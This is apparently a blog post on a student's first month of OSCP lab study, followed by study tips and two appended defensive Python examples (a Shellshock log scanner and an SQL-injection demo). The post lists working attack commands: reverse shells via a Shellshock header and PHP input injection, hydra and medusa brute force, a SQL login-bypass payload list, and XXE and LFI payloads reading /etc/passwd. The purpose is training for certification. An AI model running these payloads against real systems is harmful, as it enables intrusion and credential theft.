OSCP Journey – 1st month

Date: 02 June – 30 Aug 2019
PDF: 380/380
Videos: 149/149
Exercises: 32/42
Exploited Machines: 33
Unlocked Networks: 2

The PDF contains 380 pages spread over 18 chapters. The videos run around 7 and a half hours spread over 149 videos. I spent around 30 hours doing the materials and exercises. There are five exercises that I decided to do later since they need to be done on the correct machines in the lab. The videos and PDF fit together, but the videos seem outdated and have some differences from the PDF. If you encounter any issues while following the syntax in the course materials, use the syntax from the PDF.

Exploited Machines (33):

ALICE
ALPHA
BETA
BARRY
BETHANY
BOB
BRUCE
BRETT
CORE
CORY
DJ
DOTTY
FC4
GAMMA
HELPDESK
HOTLINE
JD
JOE
KEVIN
KRAKEN
MAIL
MIKE
ORACLE
PAIN
PAYDAY
PHOENIX
RALPH
SEAN [FW-IT]
SHERLOCK
SUFFERANCE
SUSIE
TIMECLOCK [FW-DEV]
TOPHAT

My impression is that it simulates real-world scenarios. So far all the exploits are known exploits and no puzzles or random guessing are needed. All you need is proper enumeration to spot the vulnerability.

The four hardest machines in the OSCP lab are known as The Big Four. Those machines are Pain, Sufferance, Gh0st and Humble.

LEARNED:

  • Using the up arrow to get the previous command in netcat
    – use rlwrap to wrap a readline history library around your netcat program. Another option is socat, which has readline built in. For example, if you were doing a telnet-style session with netcat you might just run:
    c:\PENTEST>revshell 192.168.1.21 9090
root@kali:~/pwk# rlwrap nc -lvp 9090
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::9090
Ncat: Listening on 0.0.0.0:9090
Ncat: Connection from 192.168.1.139.
Ncat: Connection from 192.168.1.139:2675.
Microsoft Windows [Version 10.0.17134.885]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\PENTEST>whoami
whoami
LT-JACCO\jacco

COMMANDS:

root@kali:~/pwk# nmap -vv -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi 10.11.x.1-254

root@kali:~/pwk# gobuster -u http://10.11.x.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25 -f -s 403

root@kali:~/pwk# dirb http://10.11.x.x/cgi-bin -X .cgi
root@kali:~/pwk# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.11.0.112/443 0>&1 " http://10.11.x.x:80/cgi-bin/admin.cgi
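An added detection-side example that is not part of the original post: a scanner over Apache combined-format access log lines (a constructed sample, not real traffic) that flags requests carrying the Shellshock function prologue in the Referer or User-Agent header, the same probe shape the nmap script and the curl command above use. The log format and the hypothetical IPs in the sample are assumptions.

```python
import re

# Apache "combined" log format: the last two quoted fields are Referer
# and User-Agent, the usual carriers of a Shellshock payload.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Bash function-definition prologue. Whitespace varies between probes
# ("() { :; };", "() {:;};"), so match the shape, not the literal string.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Constructed sample lines (not real traffic): one benign request, a probe
# in the User-Agent against the CGI path used above, and one in the Referer.
SAMPLE_LOG = """\
10.11.0.5 - - [12/Jul/2019:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.11.0.112 - - [12/Jul/2019:10:01:09 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 13 "-" "() { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.11.0.112/443 0>&1 "
10.11.0.112 - - [12/Jul/2019:10:01:15 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "() { :;}; echo vulnerable" "curl/7.64.0"
"""


def find_shellshock(log_text):
    """Return one (client_ip, request_line, header) tuple for each line
    whose Referer or User-Agent carries the function-definition prologue.
    Lines that do not parse as combined format are skipped."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for header in ("referer", "ua"):
            if SHELLSHOCK_RE.search(m.group(header)):
                hits.append((m.group("ip"), m.group("req"), header))
    return hits


if __name__ == "__main__":
    for ip, req, header in find_shellshock(SAMPLE_LOG):
        print(f"shellshock probe from {ip} in {header}: {req}")
```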
ATTACK FTP

ftp server :

medusa -h 10.11.1.8 -u justine -P /usr/share/wordlists/rockyou.txt -M ftp 
hydra -L USER_LIST -P PASS_LIST -f -o /data/results/10.10.1.22/scans/10.10.1.22_21_ftphydra.txt -u 10.10.1.22 -s 21 ftp 
BRUTE FORCE SSH
hydra -l justine -P /usr/share/wordlists/rockyou.txt -t 10 10.11.1.8 ssh -s 22 
medusa -u root -P /usr/share/wordlists/rockyou.txt -e ns -h 10.10.1.22 -n 22 -M ssh
SQL INJECTION
sheet with the Burp Suite Intruder Module. This list is an extended version of the SQL Login Bypass Cheat Sheet of Dr. Emin İslam Tatlı (OWASP Board Member).

root' --
root' #
root'/*
root' or '1'='1
root' or '1'='1'--
root' or '1'='1'#
root' or '1'='1'/*
root'or 1=1 or ''='
root' or 1=1
root' or 1=1--
root' or 1=1#
root' or 1=1/*
root') or ('1'='1
root') or ('1'='1'--
root') or ('1'='1'#
root') or ('1'='1'/*
root') or '1'='1
root') or '1'='1'--
root') or '1'='1'#
root') or '1'='1'/*
or 1=1
or 1=1--
or 1=1#
or 1=1/*
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
" or 1=1
" or 1=1--
" or 1=1#
" or 1=1/*
1234 ' AND 1=0 UNION ALL SELECT 'root', '81dc9bdb52d04dc20036dbd8313ed055
root" --
root" #
root"/*
root" or "1"="1
root" or "1"="1"--
root" or "1"="1"#
root" or "1"="1"/*
root" or 1=1 or ""="
root" or 1=1
root" or 1=1--
root" or 1=1#
root" or 1=1/*
root") or ("1"="1
root") or ("1"="1"--
root") or ("1"="1"#
root") or ("1"="1"/*
root") or "1"="1
root") or "1"="1"--
root") or "1"="1"#
root") or "1"="1"/*
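As an added example that is not part of the original post: a few of the login-bypass entries above fed to a constructed in-memory SQLite table, first through a login check that splices the input into the SQL text and then through the parameterized version a fix would use. The table contents, credentials and function names are assumptions for illustration; the '#' variants are left out because that comment marker is MySQL-only.

```python
import sqlite3

# Constructed sample credential table for the demo (not from the post).
USERS = [("root", "s3cret"), ("justine", "hunter2")]


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def vulnerable_login(username, password):
    """Login check that splices user input into the SQL text, the pattern
    the bypass list targets. Returns the matched username or None."""
    conn = _connect()
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def safe_login(username, password):
    """Same lookup with bound parameters: the quote and comment
    characters travel as data and never reach the SQL parser."""
    conn = _connect()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def compare(payloads, password="wrong"):
    """Feed each payload as the username with a wrong password and report
    what each implementation returns: {payload: (concatenated, bound)}."""
    return {p: (vulnerable_login(p, password), safe_login(p, password))
            for p in payloads}


if __name__ == "__main__":
    # Entries from the list above that SQLite parses.
    results = compare(["root' --", "root' or '1'='1",
                       "root' or '1'='1'--", "' or 1=1--"])
    for payload, (vuln, safe) in results.items():
        print(f"{payload!r:24} concatenated -> {vuln!r:10} bound -> {safe!r}")
```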
XXE
<?xml version="1.0" encoding="UTF-8"?>

 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root><name>&xxe;</name><tel>test</tel><email>&xxe;</email><password>tst</password></root>
LFI

See the source of any php

http://IP/index.php?m=php://filter/convert.base64-encode/resource=index
RFI

Null Bytes

http://10.11.1.24//classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00
curl -s --data "<?php system('bash -i >& /dev/tcp/172.16.237.245/4545 0>&1') ?>" "http://10.10.10.10/index.php?ACS_path=php://input%00"
BRUTE FORCE WEB
hydra 192.168.30.147 -l '' -P /usr/share/wordlists/fasttrack.txt -s 8080 http-form-post "/phpliteadmin.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect:H=Cookie: PHPSESSID=bq8vrl6updklfdvv21reb8s63j"
htaccess brute force
medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/admin -T 10

TIPS:

  • You MUST do the course materials and exercises; they are a GEM. Even if you are already familiar with most of the topics, they work as a refresher. When you attack machines in the lab it will help you spot the “vulnerability” faster. I think it took around 30-50 hours to complete. Sparing your time at the beginning for this can save your day later in the lab.
  • In the course materials and exercises, some of the tools are outdated and have version issues with the Offsec Kali VM. If you encounter any issues, search for the problem on the Offsec forum. Most of them are known issues and solutions are available there.
  • Don’t just sit there waiting for the Nmap scan to finish. Make some guesses, like checking whether a web service is open using the browser, checking whether FTP, SSH or any other common services are open using nc, and do some manual enumeration while waiting.
  • Nmap scripts are powerful tools to check for vulnerabilities. Get familiar with them and play with the scripts. All of the scripts are located in the /usr/share/nmap/scripts/ directory.
  • Most public exploits won’t work without modification. They usually have a hardcoded IP address and path. Make sure you understand the exploit and change it as necessary.
  • When compiling an exploit, compile it on an environment (OS/kernel) as close as possible to the target machine. If the target machine doesn’t have a compiler, the workaround could be downloading the same OS as the target machine, installing it and compiling there, but that takes a lot of time. I found out that some of the Vulnhub VMs that are similar to OSCP machines can be used to compile the exploit too. I am using Kioptrix machines to compile old exploits and it works so far, saving time on downloading and installing a new OS.
  • MSF is a powerful tool even though it is restricted in the exam. Use MSF for post-exploitation; it makes your life easier to upload and download files using a Meterpreter shell. It also has many post-exploitation modules that are really helpful.
  • For some of the straightforward machines, the methodology is simple: Nmap -> check the service or software version for known vulnerabilities (searchsploit or Google) -> read and understand the public exploit code -> make the necessary changes -> exploit.
  • Google anything that you find suspicious or anything that you don’t know at all.
  • Spare your time to make a write-up after you exploit a machine. It will make you understand your current methodology better and how to improve it. Someday you may also encounter similar machines and it will help you. I use CherryTree for documenting everything.

Author: Jacco Straathof
